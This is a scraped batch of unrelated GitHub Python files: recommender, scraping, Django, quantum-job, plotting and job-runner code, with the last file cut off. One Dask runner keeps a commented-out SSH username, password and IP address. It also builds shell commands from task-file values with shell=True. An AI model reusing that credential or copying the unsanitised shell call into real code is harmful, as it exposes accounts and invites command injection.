\"../../../../\"\n eng.cd(matlab_script_directory)\n\n # para_pretrain refers to a preexisting trained model. Setting it to False in order to pretrain from scratch\n load_previous_pretrained_model = False\n\n eng.cdl_main_with_params(\n matlab_backward_path_prefix + self.temp_file_folder,\n self.gsl_folder,\n matlab_backward_path_prefix + input_user_file,\n matlab_backward_path_prefix + input_item_file,\n matlab_backward_path_prefix + content_file,\n para_lv,\n para_lu,\n para_ln,\n epoch_sdae,\n epoch_dae,\n load_previous_pretrained_model,\n batch_size,\n n_features,\n nargout=0,)\n\n\n print(\"CollaborativeDL_Matlab_RecommenderWrapper: Calling matlab.engine ... done!\")\n\n os.remove(content_file)\n os.remove(input_user_file)\n os.remove(input_item_file)\n\n print(\"CollaborativeDL_Matlab_RecommenderWrapper: Loading trained model from temp matlab files ... \")\n self.USER_factors = genfromtxt(self.temp_file_folder + \"final-U.dat\", delimiter=' ')\n self.ITEM_factors = genfromtxt(self.temp_file_folder + \"final-V.dat\", delimiter=' ')\n\n assert self.USER_factors.shape[0] == self.URM_train.shape[0]\n assert self.ITEM_factors.shape[0] == self.URM_train.shape[1]\n\n assert self.USER_factors.shape[1] == self.ITEM_factors.shape[1]\n\n print(\"CollaborativeDL_Matlab_RecommenderWrapper: Loading trained model from temp matlab files ... done!\")\n self._clean_temp_folder(temp_file_folder=self.temp_file_folder)\n\n\n\n def _save_dat_file_from_URM(self, URM_to_save, file_full_path):\n\n file_object = open(file_full_path, \"w\")\n\n URM_to_save = sps.csr_matrix(URM_to_save)\n\n\n n_rows, n_cols = URM_to_save.shape\n\n for row_index in range(n_rows):\n\n start_pos = URM_to_save.indptr[row_index]\n end_pos = URM_to_save.indptr[row_index +1]\n\n profile = URM_to_save.indices[start_pos:end_pos]\n\n new_line = \"{} {}\\n\".format(len(profile), \" \".join(str(element) for element in profile))\n\n file_object.write(new_line)\n\n file_object.close()\n","repo_name":"MaurizioFD/RecSys2019_DeepLearning_Evaluation","sub_path":"Conferences/KDD/CollaborativeDL_our_interface/CollaborativeDL_Matlab_RecommenderWrapper.py","file_name":"CollaborativeDL_Matlab_RecommenderWrapper.py","file_ext":"py","file_size_in_byte":5253,"program_lang":"python","lang":"en","doc_type":"code","stars":968,"dataset":"github-code","pt":"82"} +{"seq_id":"943170075","text":"import requests\nfrom bs4 import BeautifulSoup\nimport smtplib\nfrom env import URL, HEADER, EMAIL\nimport lxml\n\n\ndef main():\n # Get amazon webpage\n response = requests.get(url=URL, headers=HEADER)\n response.raise_for_status()\n html_content = response.text\n\n # Scrap for product price\n soup = BeautifulSoup(html_content, \"lxml\")\n price_string = soup.select_one(\"#priceblock_ourprice\").text\n # Formatting the price to float\n price_without_euro = price_string.split(\"\\xa0\")[0]\n string_list = list(price_without_euro)\n string_list[string_list.index(\",\")] = \".\"\n price = float(\"\".join(string_list))\n\n # Send email if price is lower than 250 Euro\n if price < 250:\n with smtplib.SMTP(\"smtp.gmail.com\") as connection:\n connection.starttls()\n connection.login(user=EMAIL[\"my_email\"], password=EMAIL[\"my_pass\"])\n connection.sendmail(from_addr=EMAIL[\"my_email\"],\n to_addrs=EMAIL[\"to_email\"],\n msg=\"Amazon Price Check\\n\\nThe price of your searched product\"\n f\"is lower than 250 => {price}.\\n\\nBest Regards\\nPrice-Bot\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"EderLukas/python_portfolio","sub_path":"amazon_price_tracker/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"40539722594","text":"from django.views import generic\nfrom baseballsimulator.forms import FormAway, FormHome\nfrom django.shortcuts import render\n\nfrom .models import Batter, Pitcher, League \nfrom baseballsimulator.custom.correct_player import check_names, get_correct_player\nfrom baseballsimulator.custom.simulation import simulate\n\n# display the form to fill out player names\ndef index(request):\n formAway = FormAway()\n formHome = FormHome()\n context = {\n 'formAway': formAway,\n 'formHome': formHome,\n }\n return render(request, 'baseballsimulator/index.html', context)\n\n# check the player names - if successful, call results and if not, display\n# the previous form with the error messages\ndef results(request):\n batterNamesAway = [request.GET.get('batterAway1'), \n request.GET.get('batterAway2'),\n request.GET.get('batterAway3'),\n request.GET.get('batterAway4'),\n request.GET.get('batterAway5'),\n request.GET.get('batterAway6'),\n request.GET.get('batterAway7'),\n request.GET.get('batterAway8'),\n request.GET.get('batterAway9')]\n batterNamesHome = [request.GET.get('batterHome1'), \n request.GET.get('batterHome2'),\n request.GET.get('batterHome3'),\n request.GET.get('batterHome4'),\n request.GET.get('batterHome5'),\n request.GET.get('batterHome6'),\n request.GET.get('batterHome7'),\n request.GET.get('batterHome8'),\n request.GET.get('batterHome9')]\n pitcherNameAway = request.GET.get('pitcherAway')\n pitcherNameHome = request.GET.get('pitcherHome')\n\n invalidNames = check_names(batterNamesAway, pitcherNameAway, batterNamesHome, pitcherNameHome)\n \n if invalidNames:\n formAway = FormAway(initial={'batterAway1': batterNamesAway[0],\n 'batterAway2': batterNamesAway[1],\n 'batterAway3': batterNamesAway[2],\n 'batterAway4': batterNamesAway[3],\n 'batterAway5': batterNamesAway[4],\n 'batterAway6': batterNamesAway[5],\n 'batterAway7': batterNamesAway[6],\n 'batterAway8': batterNamesAway[7],\n 'batterAway9': batterNamesAway[8],\n 'pitcherAway': pitcherNameAway})\n formHome = FormHome(initial={'batterHome1': batterNamesHome[0],\n 'batterHome2': batterNamesHome[1],\n 'batterHome3': batterNamesHome[2],\n 'batterHome4': batterNamesHome[3],\n 'batterHome5': batterNamesHome[4],\n 'batterHome6': batterNamesHome[5],\n 'batterHome7': batterNamesHome[6],\n 'batterHome8': batterNamesHome[7],\n 'batterHome9': batterNamesHome[8],\n 'pitcherHome': pitcherNameHome})\n context = {\n 'formAway': formAway,\n 'formHome': formHome,\n 'invalidNames': invalidNames,\n }\n return render(request, 'baseballsimulator/index.html', context)\n else:\n batterListAway = []\n batterListHome = []\n for batterNameAway, batterNameHome in zip(batterNamesAway, batterNamesHome):\n batterListAway.append(get_correct_player(batterNameAway, 'batter'))\n batterListHome.append(get_correct_player(batterNameHome, 'batter'))\n pitcherAway = get_correct_player(pitcherNameAway, 'pitcher')\n pitcherHome = get_correct_player(pitcherNameHome, 'pitcher')\n league = League.objects.get(year=2017)\n result = simulate(500,\n batterListAway, pitcherAway, \n batterListHome, pitcherHome,\n league)\n context = {\n 'winningPercentageAway': result[0],\n 'winningPercentageHome': result[1],\n 'batterNamesAway': batterNamesAway,\n 'batterNamesHome': batterNamesHome,\n 'pitcherNameAway': pitcherNameAway,\n 'pitcherNameHome': pitcherNameHome,\n }\n return render(request, 'baseballsimulator/results.html', context)\n","repo_name":"junsooshin/baseballsimulator-django","sub_path":"baseballsimulator/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"21977103213","text":"from db import manager\nfrom db import migrations\nfrom typing import Any\ndef main(args: Any = None) -> None:\n manager.dictionaryCreateTables()\n manager.coursesCreateTable()\n manager.outboxCreateTable()\n\n#def migration1(args: Any = None) -> None:\n# manager.coursesAddColumn();\n\nif __name__ == '__main__':\n main()\n migrations.migration1()","repo_name":"Tais1990/insbit.ru","sub_path":"db.init.py","file_name":"db.init.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"30328466456","text":"from django.urls import path\nfrom .views import MedicineListView, MedicineSpecificView, ReminderListView, ReminderSpecificView, ReminderUserView, PrescriptionListView, PrescriptionSpecificView, PrescriptionUserView, NotificationsView\n\nurlpatterns = [\n path('medicines/', MedicineListView.as_view()),\n path('medicines//', MedicineSpecificView.as_view()),\n path('reminders/', ReminderListView.as_view()),\n path('reminders//', ReminderSpecificView.as_view()),\n path('reminders/user/', ReminderUserView.as_view()),\n path('prescriptions/', PrescriptionListView.as_view()),\n path('prescriptions//', PrescriptionSpecificView.as_view()),\n path('prescriptions/user/', PrescriptionUserView.as_view()),\n path('reminders/notifications/', NotificationsView.as_view())\n]\n","repo_name":"jennikate/remember-your-meds","sub_path":"prescriptions/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"41738865325","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 29 12:34:31 2022\n\n@author: jjser\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n#### #### Initializing Values of the Structured Grid #### ####\n\n# Parameter Values of Zeta\n # angle\nZ0 = 0\nZ1 = 2*np.pi\nZnum = 52\n# Znum = 50\n\n# Paramater Values of Eta\n # axes diameter\nN0 = 0.255 # {set on Nov 30} \nN1 = 3.72 # {set on Dec 1 } \nNnum = 52\n\n# Create Zeta and Eta Values then Create Grid\n''' #Do not Edit '''\nZ = np.linspace(Z0, Z1, Znum+1)\nN = np.linspace(N0, N1, Nnum+1)\nZgrid, Ngrid = np.meshgrid(Z, N)\n\n# Draws Structured Grid\nfig, ax = plt.subplots()\n# Draws vertical lines\nfor i in np.arange(len(Z)):\n ax.plot(Zgrid.T[i], Ngrid.T[i], c='blue')\n# Draws horizontal lines\nfor j in np.arange(len(N)):\n ax.plot(Zgrid[j], Ngrid[j], c='blue') \nax.set_title('Unstructured Grid')\nax.set_xlim([Z0,Z1])\nax.set_ylim([N0,N1])\nplt.show()\n\n#### #### Mapping Structured Grid to Unstructured Grid #### ####\nxgrid = np.zeros((len(Z), len(N)))\nygrid = np.zeros((len(Z), len(N)))\n\n# Mapping\nfor i in np.arange(len(Z)):\n for j in np.arange(len(N)):\n xgrid[i][j] = np.cosh(N[j]) * np.cos(Z[i])\n ygrid[i][j] = np.sinh(N[j]) * np.sin(Z[i])\n \n#### Draws Unstructured Grid\nfig, ax = plt.subplots()\n# Draws the Ellipse itself\nfor i in np.arange(len(N)):\n ax.plot(xgrid.T[i], ygrid.T[i], c='green')\nfor j in np.arange(len(Z)):\n ax.plot(xgrid[j], ygrid[j], c='green') \n# Radial\nax.plot(xgrid[int(np.floor(len(Z)/4))][-2], ygrid[int(np.floor(len(Z)/4))][-2], c='blue', marker=\".\", markersize=10) \nax.plot(xgrid[int(np.floor(len(Z)/4))][-1], ygrid[int(np.floor(len(Z)/4))][-1], c='blue', marker=\".\", markersize=10) \n# Angular\nax.plot(xgrid[0][-1], ygrid[0][-1], c='red', marker=\".\", markersize=10) \nax.plot(xgrid[1][-1], ygrid[1][-1], c='red', marker=\".\", markersize=10) \n\n\"\"\" # Dec 1 Addition for Zooming in \"\"\"\nax.set_title('Unstructured Grid')\n#ax.set_xlim([-2,2])\n#ax.set_ylim([-2,2])\n\nplt.show()\n\n\"\"\" #November 30 \"\"\"\n#### Compute Jacobian ####\nJ = np.zeros((len(Z), len(N)))\n\nfor i in np.arange(len(Z)):\n for j in np.arange(len(N)):\n J[i][j] = np.cosh(N[j])**2 * np.sin(Z[i])**2 + \\\n np.sinh(N[j])**2 * np.cos(Z[i])**2\n \nZx = np.zeros((len(Z), len(N)))\nNx = np.zeros((len(Z), len(N)))\nZy = np.zeros((len(Z), len(N)))\nNy = np.zeros((len(Z), len(N)))\n\nfor i in np.arange(len(Z)):\n for j in np.arange(len(N)):\n Zx[i][j] = np.cosh(N[j]) * np.sin(Z[i]) / J[i][j]\n Nx[i][j] = -np.sinh(N[j]) * np.cos(Z[i]) / J[i][j]\n Zy[i][j] = -np.sinh(N[j]) * np.cos(Z[i]) / J[i][j]\n Ny[i][j] = -np.cosh(N[j]) * np.sin(Z[i]) / J[i][j]\n\nfrom matplotlib import cm\n'''\nfig, ax = plt.subplots(subplot_kw={\"projection\": \"3d\"})\nsurf = ax.plot_surface(xgrid,ygrid,J,cmap=cm.coolwarm,linewidth=0, antialiased=False)\nfig.colorbar(surf, shrink=0.5, aspect=5)\n'''\n# December 1 Modification\nfig = plt.figure()\nax = plt.axes(projection='3d')\nsurf = ax.plot_surface(xgrid,ygrid,J,cmap=cm.coolwarm,linewidth=0, antialiased=False)\nfig.colorbar(surf, shrink=0.25, aspect=10, fraction=0.1, orientation='horizontal')\nax.view_init(90, 90)\n#ax.set_xlim([-2,2])\n#ax.set_ylim([-2,2])\nplt.show()\n\n# December 3 Addition\nplt.contourf(xgrid, ygrid, J)\nplt.xlim([-1.25,1.25])\nplt.ylim([-1.25,1.25])\nplt.show()\n\n\"\"\" # December 1 \"\"\"\n# distance is increased to 20 times: N1 = 3.72\n# added axes limits\n","repo_name":"jjserdo/Fluids-and-CFD","sub_path":"AEM 5253 - CFD/Project/MeshGen.py","file_name":"MeshGen.py","file_ext":"py","file_size_in_byte":3402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"73243830989","text":"n, m = map(int, input().split())\r\nONE_LAYER = \"WB\" * (m // 2 + 1)\r\n\r\ndef repainting(layer, start):\r\n cnt = 0\r\n check = [0] * len(layer)\r\n for i, l in enumerate(layer):\r\n if ONE_LAYER[start] != l:\r\n check[i] = 1\r\n start += 1\r\n return check\r\n\r\ncnts1, cnts2 = [0] * n, [0] * n\r\nstart1, start2 = 0, 1\r\n\r\nfor i in range(n):\r\n layer = input()\r\n cnts1[i] = repainting(layer, start1)\r\n cnts2[i] = repainting(layer, start2)\r\n start1, start2 = start2, start1\r\n\r\nans = float('inf')\r\nfor i in range(n - 7):\r\n tmp1 = cnts1[i:i+8]\r\n tmp2 = cnts2[i:i+8]\r\n for j in range(m - 7):\r\n s1, s2 = 0, 0\r\n for i, t in enumerate(tmp1):\r\n s1 += sum(t[j:j+8])\r\n s2 += sum(tmp2[i][j:j+8])\r\n if s1 < ans:\r\n ans = s1\r\n if s2 < ans:\r\n ans = s2\r\nprint(ans)\r\n \r\n","repo_name":"qja1998/boj","sub_path":"백준/Silver/1018. 체스판 다시 칠하기/체스판 다시 칠하기.py","file_name":"체스판 다시 칠하기.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"3464802805","text":"import cv2\nimport os\n\npath = \"/home/ubuntu/pythonProject/data/lena.jpg\"\nsrc = cv2.imread(path)\n\nif os.path.isfile(path):\n gray = cv2.imread(path, 0)\nelse:\n print(\"파일이 존재하지 않습니다.\")\n\n# 채널별로 이미지를 분리\n\nimgRGB = cv2.merge((gray, gray, gray))\n\ncv2.imshow('gray', gray)\ncv2.imshow('imgRGB', imgRGB)\n\ncv2.waitKey()\ncv2.destroyWindows()\n","repo_name":"rhehd721/Bit_opencv","sub_path":"imageEx3.py","file_name":"imageEx3.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"43728262809","text":"import json\nfrom json import JSONDecodeError\n\nfrom qiskit_ibm_runtime import QiskitRuntimeService, RuntimeDecoder, RuntimeJobFailureError, RuntimeJobMaxTimeoutError\n\nfrom gibbs_functions import print_multiple_results\n\n\n# Deprecated\ndef decode_interim_results(data, N=1):\n\tresults = []\n\tfor i in reversed(data):\n\t\ttry:\n\t\t\tline = json.loads(i, cls=RuntimeDecoder)\n\t\texcept JSONDecodeError:\n\t\t\tpass\n\t\telse:\n\t\t\t# Only append dictionary interim results\n\t\t\tif isinstance(line, dict) and line.get('final'):\n\t\t\t\tresults.append(line)\n\n\tmultiple_results = [results[i:i + N] for i in range(0, len(results), N)]\n\n\treturn multiple_results\n\n\ndef main():\n\tservice = QiskitRuntimeService(name='personal')\n\tjobs = service.jobs(limit=10, skip=0)\n\tappend = True # Append results or overwrite\n\tfor job in jobs:\n\t\tjob_id = job.job_id()\n\t\t# Get job results\n\t\ttry:\n\t\t\tresults = job.result()\n\t\texcept RuntimeJobMaxTimeoutError:\n\t\t\tprint(f\"Runtime job {job_id} timed out.\")\n\t\t\tcontinue\n\t\texcept RuntimeJobFailureError:\n\t\t\tprint(f\"Runtime job {job_id} failed.\")\n\t\t\tcontinue\n\t\telse:\n\t\t\tprint(f\"Runtime job {job_id} succeeded.\")\n\n\t\t# These will be the same for every batched run in the job\n\t\tbackend_name = results[0][0].get('backend')\n\t\tn = results[0][0].get('n')\n\t\tJ = results[0][0].get('J')\n\t\th = results[0][0].get('h')\n\t\tshots = results[0][0].get('shots')\n\t\tnoise_model = results[0][0].get('noise_model')\n\n\t\tfolder = f'jobs/{backend_name}'\n\t\tif isinstance(noise_model, str):\n\t\t\tfolder += f'_{noise_model}'\n\t\tfolder += f'/n_{n}_J_{J:.2f}_h_{h:.2f}_shots_{shots}'\n\n\t\tprint_multiple_results(results, output_folder=folder, job_id=job_id, backend=backend_name, append=append)\n\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"mirkoconsiglio/VariationalGibbsStatePreparation","sub_path":"qiskit_runtime/job_results.py","file_name":"job_results.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"542360078","text":"from django.urls import path\r\n\r\nfrom adds_blog.views import Home, ArticleDetail, search #category_maison\r\n\r\n\r\napp_name = \"articles\"\r\nurlpatterns = [\r\n path('', Home.as_view(), name=\"home\"),\r\n path('/', ArticleDetail.as_view(), name='article'),\r\n path('article/recherche', search, name='search'),\r\n #path('article/categorie', category_maison, name='category_maison'),\r\n ]\r\n","repo_name":"IBonane/AppWebDePetitesAnnonces","sub_path":"blog/adds_blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"75064457867","text":"import pygame\nimport random\nimport math\n\npygame.init()\n\n\nclass DrawInfo:\n BLACK = 0, 0, 0\n WHITE = 255, 255, 255\n GREEN = 0, 255, 0\n PINK = 251, 72, 196\n BACKGROUND_COLOR = 12, 12, 12\n\n GRAY = [(128, 128, 128),\n (160, 160, 160),\n (192, 192, 192)]\n\n FONT = pygame.font.SysFont('comicsans', 15)\n LARGE_FONT = pygame.font.SysFont('comicsans', 20)\n SIDE_PAD = 100 # px\n TOP_PAD = 150 # px\n\n def __init__(self, width, height, lst):\n self.width = width\n self.height = height\n\n self.window = pygame.display.set_mode((width, height))\n pygame.display.set_caption(\"Sorting Visualization\")\n self.set_list(lst)\n\n def set_list(self, lst):\n self.lst = lst\n self.min_val = min(lst)\n self.max_val = max(lst)\n\n self.block_width = math.floor((self.width - self.SIDE_PAD) / len(lst))\n self.block_height = math.floor((self.height - self.TOP_PAD) / (self.max_val - self.min_val))\n self.start_x = self.SIDE_PAD // 2 # start at half of padding\n\n\ndef generate_starting_list(n, min_val, max_val):\n lst = []\n for _ in range(n):\n val = random.randint(min_val, max_val)\n lst.append(val)\n return lst\n\n\ndef draw(draw_info):\n draw_info.window.fill(draw_info.BACKGROUND_COLOR)\n\n controls = draw_info.FONT.render(\"R - Reset |\"\n \" SPACE - Start Sorting |\"\n \" A - Ascending |\"\n \" D - Descending\", 1, draw_info.WHITE) # antialias\n draw_info.window.blit(controls, (draw_info.width/2 - controls.get_width()/2, 5))\n\n sortText = draw_info.FONT.render(\"B - Bubble Sort |\"\n \" I - Insertion Sort\", 1, draw_info.WHITE) # antialias\n draw_info.window.blit(sortText, (draw_info.width / 2 - sortText.get_width() / 2, 35))\n\n draw_list(draw_info)\n pygame.display.update()\n\n\ndef draw_list(draw_info, color_positions={}, clear_bg=False):\n lst = draw_info.lst\n\n if clear_bg:\n clear_rect = (draw_info.SIDE_PAD//2, draw_info.TOP_PAD,\n draw_info.width - draw_info.SIDE_PAD, draw_info.height - draw_info.TOP_PAD)\n\n pygame.draw.rect(draw_info.window, draw_info.BACKGROUND_COLOR, clear_rect)\n\n for i, val in enumerate(lst):\n x = draw_info.start_x + i * draw_info.block_width\n y = draw_info.height - (val - draw_info.min_val) * draw_info.block_height\n\n color = draw_info.GRAY[i % 3] # cycle through the 3 grays\n\n if i in color_positions:\n color = color_positions[i]\n\n # draw the bar\n pygame.draw.rect(draw_info.window, color, (x, y, draw_info.block_width, draw_info.height))\n\n if clear_bg:\n pygame.display.update()\n\n\n# algorythms\ndef bubble_sort(draw_info, ascending=True): # true default\n lst = draw_info.lst\n\n for i in range(len(lst) - 1):\n for j in range(len(lst) - 1 - i):\n num1 = lst[j]\n num2 = lst[j + 1]\n\n if (num1 > num2 and ascending) or (num1 < num2 and not ascending):\n lst[j], lst[j + 1] = lst[j + 1], lst[j] # swap values in one line without temp values\n draw_list(draw_info, {j: draw_info.GREEN, j + 1: draw_info.PINK}, True)\n yield True # pauses the function until it is called again (yield control)\n return lst\n\n\n# render screen\ndef main():\n clock = pygame.time.Clock() # regulates loop time\n\n n = 100\n min_val = 0\n max_val = 300\n\n lst = generate_starting_list(n, min_val, max_val)\n draw_info = DrawInfo(800, 600, lst)\n sorting = False\n ascending = True\n\n sorting_alg = bubble_sort\n sorting_alg_name = \"Bubble Sort\"\n sorting_alg_generator = None\n\n run = True\n while run:\n clock.tick(4800)\n\n if sorting:\n try:\n next(sorting_alg_generator)\n except StopIteration:\n sorting = False\n else:\n draw(draw_info)\n\n # render display\n pygame.display.update()\n\n # check for events\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n\n if event.type != pygame.KEYDOWN:\n continue\n if event.key == pygame.K_r: # reset the list on R\n lst = generate_starting_list(n, min_val, max_val)\n draw_info.set_list(lst)\n elif event.key == pygame.K_SPACE and sorting == False: # start sorting on SPACE if not already\n sorting = True\n sorting_alg_generator = sorting_alg(draw_info, ascending)\n elif event.key == pygame.K_a and not sorting: # ascending\n ascending = True\n elif event.key == pygame.K_d and not sorting: # descending\n ascending = False\n\n pygame.quit()\n\n\nif __name__ == \"__main__\":\n main()\n\n\n","repo_name":"StJaker/python-sorting-visualizer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"823424726","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\nfrom airflow.decorators import task\nfrom airflow.providers.postgres.hooks.postgres import PostgresHook\nfrom psycopg2.extras import execute_batch\nfrom datetime import datetime\n\n\n@task()\ndef nfl_web_scrapper() -> list:\n nfl_projections_players = []\n for i in range(1, 846, 25):\n offset = str(i)\n base_projections = f\"https://fantasy.nfl.com/research/projections?offset={offset}&position=O&sort=projectedPts&statCategory=projectedStats&statSeason=2022&statType=seasonProjectedStats\"\n res = requests.get(base_projections)\n\n soup = BeautifulSoup(res.text, \"html.parser\")\n enrty_time = datetime.now().strftime(\"%Y-%m-%dT%H:%M:%S.%f%z\")\n\n projections = soup.find_all(\n \"td\", {\"class\": \"stat projected numeric sorted last\"}\n )\n names = soup.find_all(\"td\", {\"class\": \"playerNameAndInfo first\"})\n players = [\n [\n names[i]\n .find(\"a\")\n .get_text()\n .replace(\"'\", \"\")\n .replace('\"', \"\")\n .replace(\" III\", \"\")\n .replace(\" II\", \"\")\n .replace(\"Gabe\", \"Gabriel\")\n .replace(\" Jr.\", \"\"),\n re.split(\"=\", names[i].find(\"a\")[\"href\"])[-1],\n names[i].find(\"a\")[\"href\"],\n str(projections[i])[47:-5]\n ]\n for i in range(len(names))\n ]\n nfl_projections_players.extend(players)\n nfl_players_preped = [\n [\n i[0].split(\" \")[0], #firstname\n i[0].split(\" \")[-1], #last_name\n i[0], #fullname\n i[1], #nfl_player_id\n i[2], #slug\n int(float(i[3])),\n enrty_time\n ]\n for i in nfl_projections_players\n ] \n\n return nfl_players_preped\n\n\n@task()\ndef data_validation(nfl_players_preped: list):\n return nfl_players_preped if len(nfl_players_preped) > 0 else False\n\n\n@task()\ndef nfl_player_load(nfl_players_preped: list):\n\n pg_hook = PostgresHook(postgres_conn_id=\"postgres_akv\")\n conn = pg_hook.get_conn()\n\n cursor = conn.cursor()\n print(\"Connection established\")\n\n execute_batch(\n cursor,\n \"\"\"\n INSERT INTO dynastr.nfl_player_projections (\n player_first_name,\n player_last_name,\n player_full_name,\n nfl_player_id,\n slug,\n total_projection,\n insert_date\n ) \n VALUES (%s,%s,%s,%s,%s,%s,%s)\n ON CONFLICT (nfl_player_id)\n DO UPDATE SET player_first_name = EXCLUDED.player_first_name\n , player_last_name = EXCLUDED.player_last_name\n , player_full_name = EXCLUDED.player_full_name\n , slug = EXCLUDED.slug\n , total_projection = EXCLUDED.total_projection\n , insert_date = EXCLUDED.insert_date;\n \"\"\",\n tuple(nfl_players_preped),\n page_size=1000,\n )\n\n print(f\"{len(nfl_players_preped)} nfl players to inserted or updated.\")\n conn.commit()\n cursor.close()\n return \"dynastr.nfl_player_projections\"\n\n\n@task()\ndef surrogate_key_formatting(table_name: str):\n pg_hook = PostgresHook(postgres_conn_id=\"postgres_akv\")\n conn = pg_hook.get_conn()\n cursor = conn.cursor()\n print(\"Connection established\")\n cursor.execute(\n f\"\"\"UPDATE {table_name} \n SET player_first_name = replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(player_first_name,'.',''), ' Jr', ''), ' III',''),'Jeffery','Jeff'), 'Joshua','Josh'),'William','Will'), ' II', ''),'''',''),'Kenneth','Ken'),'Mitchell','Mitch'),'DWayne','Dee')\n \"\"\"\n )\n conn.commit()\n cursor.close()\n return\n\n","repo_name":"glstream/superflexAstro","sub_path":"dags/tasks/nfl.py","file_name":"nfl.py","file_ext":"py","file_size_in_byte":3850,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"12924352062","text":"import argparse\nimport os\nimport time\nimport sys\nimport subprocess\nfrom subprocess import PIPE\nimport multiprocessing\nimport pandas as pd\n#from dask import dataframe as dd \nfrom distutils.dir_util import copy_tree, remove_tree\nimport dask\nfrom dask.distributed import Client, SSHCluster, LocalCluster, progress\nimport utils\n\n\ndef set_cluster(jobs_sum):\n while True:\n try:\n input_num = int(input('\\nWhich mode you wish to run tasks?\\n 1.Local machine\\n 2.SSH Cluster\\n'))\n if input_num in range(1,3): \n if input_num == 1:\n n_cpu=multiprocessing.cpu_count()\n #set up local cluster using dask\n cluster = LocalCluster(n_workers=n_cpu, threads_per_worker=1, dashboard_address='0')\n print(f\"Start {jobs_sum} jobs on local machine....\\n\")\n else: \n cluster = SSHCluster(\n #[\"localhost\", \"118.138.246.177\"],\n #connect_options={\"known_hosts\": None, 'username':'yifan', 'password':'prp2020'},\n [\"localhost\", \"192.168.232.129\"],\n connect_options={\"known_hosts\": None, },\n worker_options={\"nthreads\": 5, \"nprocs\": 1},\n scheduler_options={\"port\": 0, \"dashboard_address\": \":8790\"},) \n print(f\"Start {jobs_sum} jobs on SHH cluster....\\n\") \n break\n except (ValueError):\n pass\n print('Wrong input vaule!')\n continue\n return cluster\n\n\n\n\n\n#get all problem and domain paths \ndef get_path(d, s, e, p): \n for di,si,ei, planneri in zip(d,s,e,p):\n di_file = f\"{di}.csv\"\n df=pd.read_csv(os.path.join(utils.DB_PATH_PATH, di_file))\n for pi in range(int(si-1), int(ei)):\n if df['domain_path'].isnull().values.any(): #if any value is NaN, so the style is (domain p1) (domain p2) (domain p3) (domain p4)... not (d1 p1) (d2 p2) (d3 p3) (d4 p4)... \n all_d.append(df['domain_path'][0])\n else:\n all_d.append(df['domain_path'][pi]) \n all_p.append(df['problem_path'][pi])\n all_planner.append(planneri)\n return all_d, all_p, all_planner\n\n\ndef run_jobs(d, p, planner, job_id, output_folder):\n #if pyhton version >3.6, change stdout=PIPE to capture_output=True\n result = subprocess.run(f\"python3 planner.py {d} {p} {planner} {job_id} {output_folder}\", stdout=PIPE, shell=True)\n print(result.stdout.decode(\"utf-8\"))\n return result.stdout\n\n\n\n\ndef get_files_path():\n #get the name of task file \n parser = argparse.ArgumentParser()\n parser.add_argument(\"task\")\n args = parser.parse_args()\n task_path = os.path.join(utils.TASK_PATH, args.task)\n\n try:\n df = pd.read_csv(task_path) \n except:\n print(\"Task does not exist!\\nPlease use command: python3 run.py [task.csv]\")\n sys.exit()\n \n return df['domain_name'],df['start_problem'],df['end_problem'],df['planner']\n\ndef get_input_str(input_str):\n \n save_file_name=input(input_str)\n if not (save_file_name==\"\" or save_file_name.isspace()):\n return save_file_name\n else:\n print(\"Error: folder name can not be empty!\")\n sys.exit()\n\n\nif __name__ == '__main__':\n (d,s,e,p) = get_files_path()\n #all task domain files and problem files\n all_d = []\n all_p = []\n all_planner=[] \n \n # get all jobs \n (all_d,all_p,all_planner)=get_path(d, s, e, p)\n # get output folder name\n str = '\\nPlease enter a folder name for saving output data of all jobs:\\n'\n output_folder = get_input_str(str)\n \n #set cluster \n cluster = set_cluster(len(all_p))\n client = Client(cluster,asynchronous=True)\n\n st = time.time()\n futures=[]\n #'''\n for i in range(len(all_p)): \n #run_planner(all_d[i], all_p[i], all_planner[i], i) \n future = client.submit(run_jobs, all_d[i], all_p[i], all_planner[i], i, output_folder) \n futures.append(future)\n results = client.gather(futures)\n '''\n for result in results:\n print(result.decode(\"utf-8\"))\n '''\n #print(results)\n \n et = time.time()\n print(f\"Finish {len(all_p)} jobs using {et - st}(s)\")\n\n \n\n\n","repo_name":"zbmsnj1/Planner-Carrier","sub_path":"src/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":4298,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"82"} +{"seq_id":"30344036089","text":"import time\n\nimport ADCPlatform\nimport numpy as np\n\nspeedPidThread_1 = 10 # 控制阈值1\nspeedPidThread_2 = 2 # 